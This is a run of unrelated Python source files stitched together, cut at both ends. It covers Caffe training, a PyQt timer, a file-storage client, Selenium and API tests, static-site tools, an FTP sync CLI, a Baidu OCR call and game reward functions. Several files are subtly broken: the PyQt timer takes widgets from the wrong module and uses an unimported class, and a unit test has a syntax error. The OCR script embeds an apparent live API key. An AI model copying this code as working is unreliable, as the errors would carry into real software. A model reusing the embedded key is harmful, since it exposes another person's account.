TRAINING_IMAGE_SIZE or image.shape[2] == TRAINING_IMAGE_SIZE: # # I'm cropping the numpy array on the fly so that I don't have to mess with resizing # # the actual images in a separate folder each time. # image = center_crop_image(image, CLASSIFICATION_IMAGE_SIZE, CLASSIFICATION_IMAGE_SIZE) # # # try: # transformed_image = transformer.preprocess('data', image) # except: # # try to transpose and again # image = image.transpose(2,0,1) # (height, width, chan) -> (chan, height, width) # transformed_image = transformer.preprocess('data', image) # # # # copy the image data into the memory allocated for the net # net.blobs['data'].data[...] = transformed_image # # ### perform classification # output = net.forward(start='conv1') # # output_prob = output['prob'][0] # the output probability vector for the first image in the batch # max_prob = max(output_prob) # # predicted_label = output_prob.argmax() # # if predicted_label == label: # correct += 1 # # print(str(count) + " " + image_file + " " + str(label) + " " + str(predicted_label) + " " + "{:.2f}".format(max_prob)) # count += 1 # # # misclassified.close() # # # ------------------------------------------------------------------------------------------------------- def get_image_n_label_from_blob(net, image_index): return net.blobs['data'].data[image_index].copy(), np.array(net.blobs['label'].data, dtype=np.int32)[image_index], # ------------------------------------------------------------------------------------------------------- def predict_for_one_image_using_test_net(caffe, net, image, ground_truth, labels, num_of_classes): net.blobs['data'].data[0, ...] = image probs = net.forward(start='conv1')['prob'][0] top_k = (-probs).argsort()[:num_of_classes] print("ground truth: {}".format(labels[ground_truth])) for i,p in enumerate(top_k): print("{}. label: {:<20}. pred {:.2f}".format(i, labels[p], 100*probs)) print("") if (top_k[0] == ground_truth): print("success") return True else: print("fail") return False # ------------------------------------------------------------------------------------------------------- def solve(iterations, solver_prototxt, weights, display_iter, test_iter, val_txt, mean_binaryproto, data_dir, solverstate=None): """Run solvers for niter iterations, returning the loss and accuracy recorded each iteration. `solvers` is a list of (name, solver) tuples.""" # print(val_txt) # with open(val_txt) as f: # lines = f.readlines() # num_of_val_imgs = len([line for line in lines if line != ""]) # print(num_of_val_imgs) # return sys.path.append(pycaffe_module_path) caffe = import_caffe() # g_log = open(mode.log.replace(".log", "_manual.log") , "w") # mode.state = "pycaffe" solver = caffe.get_solver(solver_prototxt) if solverstate is not None: solver.restore(solverstate) print("using weights ", os.path.basename(weights)) solver.net.copy_from(weights) print("starting from iteration ", solver.iter) train_loss, val_loss, acc = [], [], [] for _ in range(iterations): if solver.iter % display_iter == 0: train_loss.append(solver.net.blobs['loss'].data.copy()) image, label = get_image_n_label_from_blob(solver.net, 0) print("image from data\n",image) print(label) if solver.iter % test_iter == 0: # solver.test_nets[0].forward() # solver.net.forward() # out = solver.test_nets[0].forward() # print(out) # print(out['prob']) val_labels = list(solver.test_nets[0].blobs['label'].data.copy().astype(np.int)) val_propabilities = solver.test_nets[0].blobs['prob'].data.copy() predicted = [tup.argmax() for tup in val_propabilities] print("labels ", val_labels) print("predictions ", predicted) val_loss.append(solver.test_nets[0].blobs['loss'].data.copy()) acc.append(solver.test_nets[0].blobs['accuracy'].data.copy()) # # pred_label = np.array(solver.test_nets[0].blobs['loss'], dtype=np.int32)[0] # # image, label = get_image_n_label_from_blob(solver.test_nets[0], 0) # predict_for_one_image_using_test_net(caffe, solver.test_nets[0], image, label, ['healthy', 'kc'], num_of_classes=2) # filters = solver.net.params['conv1'][0].data # show_blobs(filters.transpose(0, 2, 3, 1)) # feat = solver.net.blobs['conv2'].data[0, :36] # feat = solver.net.blobs['data'].data[0] # show_blobs(feat) # check_for_overfitting(loss, acc) # step here because we want to test in iteration 0 as well!! solver.step(1) # run a single SGD step in Caffe # ------------------------------------------------------------------------------------------------------- if __name__=="__main__": iterations = int(sys.argv[1]) solver_prototxt = sys.argv[2] weights = sys.argv[3] display_iter = int(sys.argv[4]) test_iter = int(sys.argv[5]) val_txt = sys.argv[6] mean_binaryproto = sys.argv[7] data_dir = sys.argv[8] solve(iterations, solver_prototxt, weights, display_iter, test_iter, val_txt, mean_binaryproto, data_dir)LairdStreak/MyPyPlayGround0 import sys from PyQt5 import QtGui from PyQt5.QtWidgets import QWidget from PyQt5 import QtCore from PyQt5.QtCore import Qt from PyQt5.QtCore import pyqtSlot class Window(QWidget): def __init__(self, parent=None): super(Window, self).__init__(parent) self.setStyleSheet('QWidget { background-color: white; }') # counter self.counter = 10 # timer self.timer = QtCore.QTimer(self) self.timer.timeout.connect(self.timeout) # timeout signal self.timer.start(1000) # updates every second # label self.label = QtGui.QLabel(self) self.label.setNum(self.counter) self.label.setAlignment(Qt.AlignCenter) # centered self.label.setStyleSheet('QLabel { color: black; }') # label's font font = self.label.font() font.setPointSize(80) self.label.setFont(font) # vertical box layout vlayout = QtGui.QVBoxLayout() vlayout.addWidget(self.label) self.setLayout(vlayout) # timeout slot @pyqtSlot() def timeout(self): self.counter -= 1 self.label.setNum(self.counter) if self.counter <= 0: self.label.setText('GO!') self.timer.stop() application = QApplication(sys.argv) # window window = Window() window.setWindowTitle('Timer') window.resize(220, 220) window.show() sys.exit(application.exec_())# Question: Write a code to rotate a square matrix """ 1 2 3 3 6 9 4 5 6 ----> 2 5 8 7 8 9 1 4 7 """ # def rotate_matrix(arr): # # swap the corners # last=len(arr[0]) # # tmp = arr[0][0] # # arr[0][0] = arr[0][len] # # arr[0][len] = tmp # for i in range(last): # for j in range(last): # tmp = arr[i,j] # arr[i,j] = a # arr[i+1,j] = arr[i,j] import numpy as np my_array = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) print(my_array) def rotate_matrix(matrix): n = len(matrix) for layer in range(n//2): first = layer last = n - layer -1 for i in range(first, last): # save top element top = matrix[layer][i] # move left element to top matrix[layer][i] = matrix[-i-1][layer] # move bottom element to left matrix[-i-1][layer] = matrix[-layer-1][-i-1] # move right element to bottom matrix[-layer-1][-i-1] = matrix[i][-layer-1] # move to right matrix[i][-layer-1] = top return matrix print(rotate_matrix(my_array)) #!/bin/env python3 import i3ipc i3 = i3ipc.Connection() cons = i3.get_tree().find_focused().workspace().nodes for con in cons: children = con.descendants() if not children: print(con.name, con.percent) else: print(con.layout, con.percent) indents = 1 for child in children: if child.name == None: print("\t" * indents, child.layout, child.percent) indents += 1 else: print("\t" * indents, child.name, child.percent) jtviegas/config-resolver from configuration_overrider.abstract_overrider import AbstractOverrider class DummyOverrider(AbstractOverrider): def __init__(self, key: str, value: str): self.__key = key self.__value = value def get(self, key) -> str: _result = None if key == self.__key: _result = self.__value return _resultdanieldavidraj/Blob-Storage-System import re import mimetypes import requests from os.path import exists as file_exists from requests.exceptions import HTTPError base_url = "http://localhost:8000" session = requests.Session() def user_logged_in(): response = session.get(f"{base_url}/loggedin") if response.status_code == 200: return True return False def get_session(): try: response = session.get(f"{base_url}/loggedin") response.raise_for_status() except HTTPError as http_err: print(response.text) else: return response.json()['token'] def create_session(token): try: payload = {'token': token} response = session.post(f"{base_url}/create_session", json=payload) response.raise_for_status() except HTTPError as http_err: print(http_err) def get_token(username, password): payload = {'username': username, 'password': password} try: response = session.post(f"{base_url}/token", data=payload) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: return response.json()['token_type'] + " " + response.json()['access_token'] def Login(): username = input("Username: ") password = input("Password: ") token = get_token(username, password) if token: print("\nSuccessfully logged in") create_session(token) return token def Register(): username = input("Username: ") password = input("Password: ") payload = {'username': username, 'password': password} try: response = session.post(f"{base_url}/users/", json=payload) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("\nSuccessfully registered") token = get_token(username, password) create_session(token) return token def Authentication(): while True: if user_logged_in(): print("User already logged in") return get_session() else: print("1) Login") print("2) Register") try: choice = int(input("Choice: ")) if choice == 1: token = Login() if token: return token elif choice == 2: token = Register() if token: return token else: print("Invalid entry") except ValueError as ve: print("Enter an integer") def display_files(files): sno = 1 for file in files: print(f"{sno})") print(f"Id: {file['id']}") print(f"Name: {file['title']}") print(f"Description: {file['description']}") sno += 1 def display_users(users): sno = 1 for user in users: print(f"{sno})") print(f"Id: {user['id']}") print(f"Username: {user['username']}") sno += 1 def view_file(id): file_id = input("Enter the id of the file to view: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: file = response.json() print(f"Id: {file['id']}") print(f"Name: {file['title']}") print(f"Description: {file['description']}") def upload_file(id): try: file_name = input("Enter the file name: ") if file_exists(file_name): content_type = mimetypes.guess_type(file_name) files = {'uploadfile': (file_name, open(file_name, 'rb'), content_type[0])} response = session.post(f"{base_url}/users/{id}/files", files=files) response.raise_for_status() else: print("File not found") except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully uploaded") def edit_file(id): file_id = input("Enter the id of the file to edit: ") print("Enter to change or leave empty to remain as it is!") title = input("Enter the name of the file: ") description = input("Enter the description of the file: ") data = {'title': title, 'description': description} try: response = session.put(f"{base_url}/users/{id}/files/{file_id}", json=data) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully edited") def delete_file(id): file_id = input("Enter the id of the file to delete: ") try: response = session.delete(f"{base_url}/users/{id}/files/{file_id}") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully deleted") def share_file(id): file_id = input("Enter the id of the file to share: ") response = session.get(f"{base_url}/users/") display_users(response.json()) username = input("Enter the username of the user to share: ") data = {'username': username} try: response = session.patch(f"{base_url}/users/{id}/files/{file_id}/share", json=data) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully shared") def download_file(id): file_id = input("Enter the id of the file to download: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}/download", allow_redirects=True) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: content_type = response.headers.get('content-type') extension = content_type.split("/")[-1] if 'plain' in extension: extension = 'txt' cd = response.headers.get('content-disposition') fname = re.findall("filename=(.+)", cd) if not fname: fname = re.findall("utf-8''(.+)", cd) fname = fname[0].replace('"', '').replace('%20', ' ') if extension not in fname: fname += '.' + extension open(fname, 'wb').write(response.content) print("Successfully downloaded") def compress_file(id): file_id = input("Enter the id of the file to compress: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}/compress", allow_redirects=True) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: cd = response.headers.get('content-disposition') fname = re.findall("filename=(.+)", cd) if not fname: fname = re.findall("utf-8''(.+)", cd) fname = fname[0].replace('"', '').replace('%20', ' ') open(fname, 'wb').write(response.content) print("Successfully compressed and downloaded") def logout(): try: response = session.post(f"{base_url}/logout") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully logged out") return True def Menu(id): while True: response = session.get(f"{base_url}/users/{id}/files") print("\nOwn Files: ") own_files = response.json()['own_files'] if own_files: display_files(own_files) else: print("No files owned") print("\nShared Files: ") shared_files = response.json()['shared_files'] if shared_files: display_files(shared_files) else: print("No files shared") print("\n1) View file") print("2) Upload file") print("3) Rename file") print("4) Delete file") print("5) Share file") print("6) Download file") print("7) Compress file") print("8) Logout") try: choice = int(input("Choice: ")) if choice == 1: view_file(id) elif choice == 2: upload_file(id) elif choice == 3: edit_file(id) elif choice == 4: delete_file(id) elif choice == 5: share_file(id) elif choice == 6: download_file(id) elif choice == 7: compress_file(id) elif choice == 8: if logout(): break else: print("Invalid entry") except ValueError as ve: print("Enter an integer") if __name__=="__main__": print("Simple Blob Storage System\n") token = Authentication() session.headers.update({ "accept": "application/json", "Authorization": token }) try: response = session.get(f"{base_url}/users/me/") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: id = response.json()['id'] print(f"Username: {response.json()['username']}") Menu(id) Task 11_attempt 2.py import pytest from selenium import webdriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select import random import string @pytest.fixture def driver(request): wd = webdriver.Chrome() request.addfinalizer(wd.quit) return wd def generate_random_email(): domains = ["hotmail.com", "gmail.com", "aol.com", "mail.com" , "mail.kz", "yahoo.com"] letters = string.ascii_lowercase[:12] name = ''.join(random.choice(letters) for i in range(10)) email = name + '@' + random.choice(domains) return email def test_example(driver): driver.get("http://litecart.stqa.ru/en/create_account") driver.find_element_by_css_selector("tr:nth-child(1) td:nth-child(1) [name=tax_id]").send_keys("87319") driver.find_element_by_css_selector("tr:nth-child(1) td:nth-child(2) [name=company]").send_keys("Piterstar") driver.find_element_by_css_selector("tr:nth-child(2) td:nth-child(1) [name=firstname]").send_keys("Anna") driver.find_element_by_css_selector("tr:nth-child(2) td:nth-child(2) [name=lastname]").send_keys("Kolegova") driver.find_element_by_css_selector("tr:nth-child(3) td:nth-child(1) [name=address1]").send_keys("960 Sterling Pl Brooklyn, NY 11213") driver.find_element_by_css_selector("tr:nth-child(4) td:nth-child(1) [name=postcode]").send_keys("63837") driver.find_element_by_css_selector("tr:nth-child(4) td:nth-child(2) [name=city]").send_keys("New York") driver.find_element_by_css_selector("span.select2-selection__arrow").click() select1 = Select(driver.find_element_by_css_selector("select.select2-hidden-accessible")) select1.select_by_visible_text("United States") wait = WebDriverWait(driver, 10) element = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,"tr:nth-child(5) td:nth-child(2) select"))) driver.find_element_by_css_selector("tr:nth-child(5) td:nth-child(2) select").click() select_zone = Select(driver.find_element_by_css_selector("tr:nth-child(5) td:nth-child(2) select")) select_zone.select_by_visible_text("Alaska") current_email = generate_random_email() driver.find_element_by_css_selector("tr:nth-child(6) td:nth-child(1) [name=email]").send_keys(current_email) driver.find_element_by_css_selector("tr:nth-child(6) td:nth-child(2) [name=phone]").send_keys("+79117621690") driver.find_element_by_css_selector("tr:nth-child(8) td:nth-child(1) [name=password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(8) td:nth-child(2) [name=confirmed_password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(9) button").click() driver.get("http://litecart.stqa.ru/en/") driver.find_element_by_css_selector("div#box-account li:nth-child(4) a").click() driver.find_element_by_css_selector("div.content [name=email]").send_keys(current_email) driver.find_element_by_css_selector("div.content [name=password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(4) button").click() driver.find_element_by_css_selector("div#box-account li:nth-child(4) a").click() examples/index.py1-10 #!/usr/bin/env python from __future__ import print_function from temper import Temper def main(): # init and call temper to render temper = Temper() print(temper.render(Index().render)) print(temper.render(Page().render)) print(temper.render(SeriousPage().render)) class Index(object): ''' Hello, Example!

    Hello, World!

    ''' title = 'Hello, Example!' def body(self, t, c): # a "block" can be any python function or property t('Hello, World!') def render(self, t, c): # render the base template t.doctype t.comment(self.__class__.__name__) with t.html(): with t.head(): with t.title(): t(self.title) with t.style(type='text/css'): t('.bold { font-weight: bold; }') with t.body(): with t.p(class_='bold'): self.body(t, c) class Page(Index): ''' Hello, Example!

    Hello, World! Hello, Temper!

    ''' def body(self, t, c): # use python inheritance for blocks super(Page, self).body(t, c) t('Hello, Temper!') class SeriousPage(Index): ''' Now then...

    Let's get down to business.

    ''' title = 'Now then...' def body(self, t, c): # don't call super to completely override t("Let's get down to business.") if __name__ == '__main__': main() import os import sys from stango import Stango def quickstart(): conf_code = '''\ from stango.files import Files import views index_file = 'index.html' files = Files( ('', views.hello, { 'message': 'Hello, World!', 'link': 'greeting.html' }), ('greeting.html', views.hello, { 'message': 'Greetings, World!', 'link': 'index.html' }), ) ''' views_code = '''\ def hello(context, message, link): return context.render_template('hello.html', message=message, link=link) ''' hello_template = '''\ {{ message }}

    {{ message }}

    Another greeting here. ''' hello_css = '''\ h1 { color: #0c0; } ''' init_files = [ ('__init__.py', '', 0o644), ('conf.py', conf_code, 0o644), ('views.py', views_code, 0o644), ('static/hello.css', hello_css, 0o644), ('templates/hello.html', hello_template, 0o644), ] for filename, contents, mode in init_files: print('Creating %s' % filename) dirname = os.path.dirname(filename) if dirname and not os.path.exists(dirname): os.makedirs(dirname) fobj = open(filename, 'w') fobj.write(contents) fobj.close() os.chmod(filename, mode) print('Now run "stango runserver" or "stango generate"') return 0 def print_help(): print('''\ usage: %s COMMAND [ARGS...] Available commands: generate [OUTDIR] Generate the pages as flat files to directory OUTDIR (default: out). If OUTDIR doesn't exist, it is created, and if it already exists, it is cleared first. runserver [[HOST:]PORT] Start the development server on http://HOST:PORT/ (default: http://127.0.0.1:8000/). quickstart Initialize a boilerplate example project in the current directory. ''' % sys.argv[0]) sys.exit(2) CONFIG_DEFAULTS = { 'autoreload': [], 'index_file': None, 'jinja_extensions': [], 'post_render_hook': None, } def run(): if len(sys.argv) < 2: print_help() if sys.argv[1] not in ['runserver', 'generate', 'quickstart']: print_help() if sys.argv[1] == 'quickstart': if len(sys.argv) != 2: print_help() sys.exit(quickstart()) if not os.path.exists('conf.py'): print('conf.py not found', file=sys.stderr) sys.exit(1) try: backup = sys.path sys.path = [''] + sys.path config = {} exec(open('conf.py').read(), config) finally: sys.path = backup for k, v in list(CONFIG_DEFAULTS.items()): config.setdefault(k, v) if 'files' not in config: print("conf.py doesn't define the 'files' variable", file=sys.stderr) sys.exit(1) manager = Stango() manager.files = config['files'] manager.index_file = config['index_file'] manager.jinja_extensions = config['jinja_extensions'] manager.template_dirs.insert(0, 'templates') if config['post_render_hook']: manager.add_hook('post_render_hook', config['post_render_hook']) if sys.argv[1] == 'runserver': host = '127.0.0.1' port = 8000 if len(sys.argv) == 3: if ':' in sys.argv[2]: host, port = sys.argv[2].split(':') else: port = sys.argv[2] try: port = int(port) except ValueError: print_help() elif len(sys.argv) > 3: print_help() def do_serve(): print('Starting server at http://%s:%d/' % (host, port)) httpd = manager.make_server(host, port, verbose=True) httpd.serve_forever() import stango.autoreload stango.autoreload.main(do_serve, config['autoreload']) elif sys.argv[1] == 'generate': if len(sys.argv) == 2: outdir = 'out' elif len(sys.argv) == 3: outdir = sys.argv[2] else: print_help() print('Generating to %s...' % outdir) sys.exit(manager.generate(outdir) or 0) else: print_help() menu = ('a','b','c','d','e') for food in menu: print(food) menu = ('a','b','c','d','f') for food in menu: print(food)# Generated by Django 3.1.7 on 2021-03-29 10:12 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import phonenumber_field.modelfields class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Building', fields=[ ('building_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('building_name', models.CharField(max_length=30)), ('n_floors', models.IntegerField(default=0)), ('n_flats', models.IntegerField(default=0)), ], ), migrations.CreateModel( name='Flat', fields=[ ('flat_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('flat_no', models.CharField(max_length=20)), ('flat_type', models.IntegerField()), ('flat_area', models.IntegerField(default=0)), ('vaccancy', models.IntegerField(default=0)), ('building_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.building')), ], ), migrations.CreateModel( name='Service_Directory', fields=[ ('service_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('name', models.CharField(max_length=50)), ('profession', models.CharField(max_length=30)), ('building_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.building')), ], ), migrations.CreateModel( name='Phone_Directory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('phone_no', phonenumber_field.modelfields.PhoneNumberField(max_length=128, region=None)), ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.service_directory')), ], ), migrations.CreateModel( name='Occupies', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('ownership', models.CharField(choices=[('Tenant', 'Tenant'), ('Owner', 'Owner')], max_length=10)), ('flat_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.flat')), ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ] dedok/tnt-accountst/basic_test.py #!/usr/bin/env python # # Copyrights (C) 2017 # import sys import urllib2 import traceback import urlparse import json import time # # Helpers # def get(url, verbose = False): out = '' try: res = urllib2.urlopen(urllib2.Request(url)) out = res.read() out = out + res.read() rc = res.getcode() if verbose: print("url: ", url, " code: ", rc, " recv: '", out, "'") return (rc, out) except urllib2.HTTPError, e: if e.code == 400: out = e.read(); if verbose: print("url: ", url, " code: ", e.code, " recv: '", out, "'") return (e.code, out) except Exception, e: print traceback.format_exc() return (False, e) def post(url, data, verbose = False): out = '{}' try: req = urllib2.Request(url) req.add_header('Content-Type', 'application/json') res = urllib2.urlopen(req, json.dumps(data).encode('utf8')) out = res.read() out = out + res.read() rc = res.getcode() if verbose: print("code: ", rc, " recv: '", out, "'") return (rc, json.loads(out)) except urllib2.HTTPError as e: if e.code == 400: out = e.read(); return (e.code, json.loads(out)) except Exception as e: print(traceback.format_exc()) return (False, e) ## Test cases #BASE_URL = 'http://sh2.tarantool.org/api' BASE_URL = 'http://127.0.0.1:8081/api' account_id = int(time.time()) print ('[+] /add/user') url = BASE_URL + '/add/user' user_params = {"params":[{"account_id": account_id, "user_name": "Vasiliy" }]} rc, out = post(url, user_params) print (rc, out) assert rc == 200, 'rc != 200' user_params['params'][0]['id'] = out['result'][0]['id'] assert user_params['params'] == out['result'], 'params != result' print ('[+] OK') print ('[+] /add/operations') for _ in range(0, 10): url = BASE_URL + '/add/operation' opt_params = {"params":[{ "account_id": account_id, "timestamp": int(time.time()) - _, "type": 0, "description": "Give me my money!!!!", "amount": 100500, "user_id": user_params['params'][0]['id'] }]} rc, out = post(url, opt_params) opt_params['params'][0]['id'] = out['result'][0][1]['id'] out['result'][0][1]['account_id'] = opt_params['params'][0]['account_id'] assert rc == 200, 'rc != 200' assert user_params['params'][0] == out['result'][0][0] and \ opt_params['params'][0] == out['result'][0][1], 'params != result' print ('[+] OK') print ('[+] /get/operations') url = BASE_URL + '/get/operations?ts_start=0&ts_end=' + str(int(time.time())) rc, out = get(url) print ('[+] OK') print ('[+] /get/account/operations') url = BASE_URL + '/get/account/operations?account_id=' + str(account_id) rc, out = get(url) print ('[+] OK') print ('[+] /get/account/balance') url = BASE_URL + '/get/account/balance?account_id=' + str(account_id) rc, out = get(url) print ('[+] OK') """Clean Code in Python - Chapter 5: Decorators Unit tests for class decorators """ import unittest from datetime import datetime from decorator_class_1 import LoginEvent as LoginEvent1 from decorator_class_2 import LoginEvent as LoginEvent2 class TestLoginEventSerialized(unittest.TestCase): classes_under_test = (LoginEvent1, LoginEvent2) def test_serializetion(self): for class_ in self.classes_under_test: with self.subTest(case=class_): event = class_( "username", "password", "127.0.0.1", datetime(2016, 7, 20, 15, 45), ) expected = { "username": "username", "password": **", "ip": "127.0.0.1", "timestamp": "2016-07-20 15:45", } self.assertEqual(event.serialize(), expected) if __name__ == "__main__": unittest.main() wengzy/pyftpsync # -*- coding: utf-8 -*- """ Simple folder synchronization using FTP. (c) 2012-2021 ; see https://github.com/mar10/pyftpsync Licensed under the MIT license: https://www.opensource.org/licenses/mit-license.php Usage examples: > pyftpsync.py --help > pyftpsync.py upload . ftps://example.com/myfolder """ import argparse import platform import sys from pprint import pprint from ftpsync import __version__ from ftpsync.cli_common import ( common_parser, creds_parser, matcher_parser, verbose_parser, ) from ftpsync.run_command import add_run_parser, handle_run_command from ftpsync.scan_command import add_scan_parser from ftpsync.synchronizers import ( BiDirSynchronizer, DownloadSynchronizer, UploadSynchronizer, ) from ftpsync.targets import FsTarget, make_target from ftpsync.tree_command import add_tree_parser from ftpsync.util import ( DEBUG_FLAGS, PYTHON_VERSION, check_cli_verbose, namespace_to_dict, set_pyftpsync_logger, ) # =============================================================================== # run # =============================================================================== def run(): """CLI main entry point.""" # Use print() instead of logging when running in CLI mode: set_pyftpsync_logger(None) parser = argparse.ArgumentParser( description="Synchronize folders over FTP.", epilog="See also https://github.com/mar10/pyftpsync", parents=[verbose_parser], ) # Note: we want to allow --version to be combined with --verbose. However # on Py2, argparse makes sub-commands mandatory, unless `action="version"` is used. if check_cli_verbose(3) > 3: version_info = "pyftpsync/{} Python/{} {}".format( __version__, PYTHON_VERSION, platform.platform() ) else: version_info = "{}".format(__version__) parser.add_argument("-V", "--version", action="version", version=version_info) subparsers = parser.add_subparsers(help="sub-command help") # --- Create the parser for the "upload" command --------------------------- sp = subparsers.add_parser( "upload", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="copy new and modified files to remote folder", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--force", action="store_true", help="overwrite remote files, even if the target is newer " "(but no conflict was detected)", ) sp.add_argument( "--resolve", default="ask", choices=["local", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.add_argument( "--delete", action="store_true", help="remove remote files if they don't exist locally", ) sp.add_argument( "--delete-unmatched", action="store_true", help="remove remote files if they don't exist locally " "or don't match the current filter (implies '--delete' option)", ) sp.set_defaults(command="upload") # --- Create the parser for the "download" command ------------------------- sp = subparsers.add_parser( "download", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="copy new and modified files from remote folder to local target", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--force", action="store_true", help="overwrite local files, even if the target is newer " "(but no conflict was detected)", ) sp.add_argument( "--resolve", default="ask", choices=["remote", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.add_argument( "--delete", action="store_true", help="remove local files if they don't exist on remote target", ) sp.add_argument( "--delete-unmatched", action="store_true", help="remove local files if they don't exist on remote target " "or don't match the current filter (implies '--delete' option)", ) sp.set_defaults(command="download") # --- Create the parser for the "sync" command ----------------------------- sp = subparsers.add_parser( "sync", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="synchronize new and modified files between remote folder and local target", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--resolve", default="ask", choices=["old", "new", "local", "remote", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.set_defaults(command="sync") # --- Create the parser for the "run" command ----------------------------- add_run_parser(subparsers) # --- Create the parser for the "scan" command ----------------------------- add_scan_parser(subparsers) # --- Create the parser for the "tree" command ----------------------------- add_tree_parser(subparsers) # --- Parse command line --------------------------------------------------- args = parser.parse_args() args.verbose -= args.quiet del args.quiet # print("verbose", args.verbose) ftp_debug = 0 if args.verbose >= 6: ftp_debug = 1 if args.debug: if args.verbose < 4: parser.error("'--debug' requires verbose level >= 4") DEBUG_FLAGS.update(args.debug) # Modify the `args` from the `pyftpsync.yaml` config: if getattr(args, "command", None) == "run": handle_run_command(parser, args) if callable(getattr(args, "command", None)): # scan_handler try: return args.command(parser, args) except KeyboardInterrupt: print("\nAborted by user.", file=sys.stderr) sys.exit(3) elif not hasattr(args, "command"): parser.error( "missing command (choose from 'upload', 'download', 'run', 'sync', 'scan')" ) # Post-process and check arguments if hasattr(args, "delete_unmatched") and args.delete_unmatched: args.delete = True args.local_target = make_target(args.local, {"ftp_debug": ftp_debug}) if args.remote == ".": parser.error("'.' is expected to be the local target (not remote)") args.remote_target = make_target(args.remote, {"ftp_debug": ftp_debug}) if not isinstance(args.local_target, FsTarget) and isinstance( args.remote_target, FsTarget ): parser.error("a file system target is expected to be local") # Let the command handler do its thing opts = namespace_to_dict(args) if args.command == "upload": s = UploadSynchronizer(args.local_target, args.remote_target, opts) elif args.command == "download": s = DownloadSynchronizer(args.local_target, args.remote_target, opts) elif args.command == "sync": s = BiDirSynchronizer(args.local_target, args.remote_target, opts) else: parser.error("unknown command '{}'".format(args.command)) s.is_script = True try: s.run() except KeyboardInterrupt: print("\nAborted by user.", file=sys.stderr) sys.exit(3) finally: # Prevent sporadic exceptions in ftplib, when closing in __del__ s.local.close() s.remote.close() stats = s.get_stats() if args.verbose >= 5: pprint(stats) elif args.verbose >= 1: if args.dry_run: print("(DRY-RUN) ", end="") print( "Wrote {}/{} files in {} directories, skipped: {}.".format( stats["files_written"], stats["local_files"], stats["local_dirs"], stats["conflict_files_skipped"], ), end="", ) if stats["interactive_ask"]: print() else: print(" Elap: {}.".format(stats["elap_str"])) return # Script entry point if __name__ == "__main__": # Just in case... from multiprocessing import freeze_support freeze_support() run() # 引入文字识别OCR SDK from aip import AipOcr # 定义常量 APP_ID = '9838807' API_KEY = 'ZyNwfGnvQQnYPIuGt25iTWhw' SECRET_KEY = '' # 读取图片 def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() # 初始化ApiOcr对象 aipOcr = AipOcr(APP_ID, API_KEY, SECRET_KEY) # 定义参数变量 options = { 'detect_direction': 'true', 'language_type': 'CHN_ENG', } # 调用通用文字识别接口 result = aipOcr.basicGeneral(get_file_content('general.png'), options) print(result) sigma_graph/envs/figure8/rewards/rewards_simple.py from math import ceil # default hyper-parameters for rewards DEFAULT_REWARDS = { "step": {"reward_step_on": True, "red_2_blue": 4, "blue_2_red": -3, "red_overlay": -2, }, "episode": { "reward_episode_on": True, "episode_decay_soft": True, "health_lookup": {"type": "table", "reward": [32, 16, 8, 4, 2, 0], "damage": [0, 1, 2, 3, 4, 100]}, "faster_lookup": {"type": "segment", "pivot_step": 10, "reward_init": 16, "reward_decay": 1}, "soft_bound": {"dist": [1, 2], "decay_factor": [0.25, 0.125]} }, } def get_step_engage(r_engages_b, b_engages_r, team_switch=False, **rewards): assert len(rewards), "No step rewards provided.." step_reward = 0 if r_engages_b: step_reward += rewards["red_2_blue"] if b_engages_r: step_reward += rewards["blue_2_red"] if team_switch is True: step_reward = -step_reward return step_reward def get_step_overlay(overlay, **rewards): assert len(rewards), "No step rewards provided.." return rewards["red_overlay"] if overlay else 0 def 